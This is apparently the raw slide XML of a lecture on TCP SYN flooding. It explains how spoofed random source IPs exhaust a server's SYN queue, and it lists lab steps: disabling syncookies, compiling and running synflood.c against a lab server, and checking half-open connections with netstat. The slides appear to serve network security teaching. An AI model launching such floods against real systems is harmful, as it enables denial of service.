                  <a:pt x="190774" y="474730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="225859" y="527357"/>
                  <a:pt x="179810" y="463766"/>
                  <a:pt x="223666" y="507622"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="249978" y="533934"/>
                  <a:pt x="221475" y="522973"/>
                  <a:pt x="256558" y="540514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="264915" y="544692"/>
                  <a:pt x="295586" y="552267"/>
                  <a:pt x="302607" y="553671"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="341843" y="561518"/>
                  <a:pt x="352266" y="560764"/>
                  <a:pt x="394705" y="566827"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="407909" y="568713"/>
                  <a:pt x="421018" y="571213"/>
                  <a:pt x="434175" y="573406"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="471453" y="571213"/>
                  <a:pt x="508852" y="570543"/>
                  <a:pt x="546009" y="566827"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="552909" y="566137"/>
                  <a:pt x="559371" y="562981"/>
                  <a:pt x="565744" y="560249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="608167" y="542067"/>
                  <a:pt x="577164" y="553111"/>
                  <a:pt x="618371" y="527357"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="641306" y="513023"/>
                  <a:pt x="645742" y="513936"/>
                  <a:pt x="670998" y="507622"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="677577" y="503236"/>
                  <a:pt x="683662" y="498001"/>
                  <a:pt x="690734" y="494465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="696936" y="491364"/>
                  <a:pt x="705054" y="492218"/>
                  <a:pt x="710469" y="487886"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="755930" y="451517"/>
                  <a:pt x="686096" y="484207"/>
                  <a:pt x="743361" y="448416"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="753375" y="442157"/>
                  <a:pt x="765691" y="440540"/>
                  <a:pt x="776253" y="435259"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="834753" y="406008"/>
                  <a:pt x="745423" y="439292"/>
                  <a:pt x="828880" y="408945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="841914" y="404206"/>
                  <a:pt x="855474" y="400940"/>
                  <a:pt x="868351" y="395789"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="879315" y="391403"/>
                  <a:pt x="890186" y="386778"/>
                  <a:pt x="901243" y="382632"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="907736" y="380197"/>
                  <a:pt x="914916" y="379421"/>
                  <a:pt x="920978" y="376053"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="934801" y="368374"/>
                  <a:pt x="947109" y="358229"/>
                  <a:pt x="960449" y="349740"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="971236" y="342875"/>
                  <a:pt x="982702" y="337096"/>
                  <a:pt x="993341" y="330004"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="999919" y="325619"/>
                  <a:pt x="1006005" y="320384"/>
                  <a:pt x="1013076" y="316848"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1019278" y="313747"/>
                  <a:pt x="1026437" y="313001"/>
                  <a:pt x="1032811" y="310269"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1041825" y="306406"/>
                  <a:pt x="1050020" y="300754"/>
                  <a:pt x="1059125" y="297112"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1072002" y="291962"/>
                  <a:pt x="1098596" y="283956"/>
                  <a:pt x="1098596" y="283956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1107367" y="277377"/>
                  <a:pt x="1115390" y="269660"/>
                  <a:pt x="1124909" y="264220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1130929" y="260780"/>
                  <a:pt x="1138874" y="261488"/>
                  <a:pt x="1144644" y="257642"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1152385" y="252482"/>
                  <a:pt x="1156809" y="243314"/>
                  <a:pt x="1164380" y="237907"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1186196" y="222324"/>
                  <a:pt x="1188956" y="227374"/>
                  <a:pt x="1210429" y="218171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1219442" y="214308"/>
                  <a:pt x="1228228" y="209880"/>
                  <a:pt x="1236742" y="205015"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1243607" y="201092"/>
                  <a:pt x="1248977" y="194358"/>
                  <a:pt x="1256478" y="191858"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1286073" y="181993"/>
                  <a:pt x="1307786" y="190543"/>
                  <a:pt x="1335419" y="172122"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1360924" y="155120"/>
                  <a:pt x="1347654" y="161466"/>
                  <a:pt x="1374889" y="152387"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1377082" y="145809"/>
                  <a:pt x="1385629" y="138199"/>
                  <a:pt x="1381468" y="132652"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1376043" y="125419"/>
                  <a:pt x="1363731" y="128933"/>
                  <a:pt x="1355154" y="126074"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1219057" y="80709"/>
                  <a:pt x="1406310" y="137870"/>
                  <a:pt x="1295948" y="106338"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1270521" y="99073"/>
                  <a:pt x="1269661" y="94108"/>
                  <a:pt x="1236742" y="93181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1094249" y="89167"/>
                  <a:pt x="951677" y="88796"/>
                  <a:pt x="809145" y="86603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="708246" y="46243"/>
                  <a:pt x="804847" y="80531"/>
                  <a:pt x="565744" y="66868"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="558821" y="66472"/>
                  <a:pt x="552736" y="61971"/>
                  <a:pt x="546009" y="60289"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="535161" y="57577"/>
                  <a:pt x="523903" y="56653"/>
                  <a:pt x="513116" y="53711"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="499736" y="50062"/>
                  <a:pt x="487245" y="43274"/>
                  <a:pt x="473646" y="40554"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="427155" y="31256"/>
                  <a:pt x="451361" y="37512"/>
                  <a:pt x="401283" y="20819"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="394705" y="14241"/>
                  <a:pt x="389625" y="5700"/>
                  <a:pt x="381548" y="1084"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="368173" y="-6559"/>
                  <a:pt x="365102" y="28494"/>
                  <a:pt x="361813" y="3397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73407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0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>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Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Shape 166"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1735450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYN packets need to use random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sourceIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, because reusing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sourceIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will be blocked by the firewalls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sourceIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is mostly unreachable and so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ACK will return to server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Due to SYN-ACK retransmissions, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the TCB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>record for client will stay in SYN queue for long and makes the queue easily full.  </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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31120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SYN Flooding Attack – using c program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312479" y="1257237"/>
            <a:ext cx="8542072" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" fontAlgn="ctr">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Step 1. On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> machine (10.9.0.5)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E75B5"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Disable the projection against SYN Flooding (lab setup has already done this)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -w net.ipv4.tcp_syncookies=0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" fontAlgn="ctr">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Step 2. On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> machine (10.9.0.1):   Launch the Attack </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E75B5"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>synflood.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 10.9.0.5 23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391117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208203"/>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SYN Flooding Attack – using c program</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t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667711" y="1000669"/>
            <a:ext cx="7265860" cy="3801041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" fontAlgn="ctr">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Step 3. Check Results</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E75B5"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538135"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> machine (10.9.0.6): telnet to server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>telnet 10.9.0.5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> machine (10.9.0.5):      count # of half-open connections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
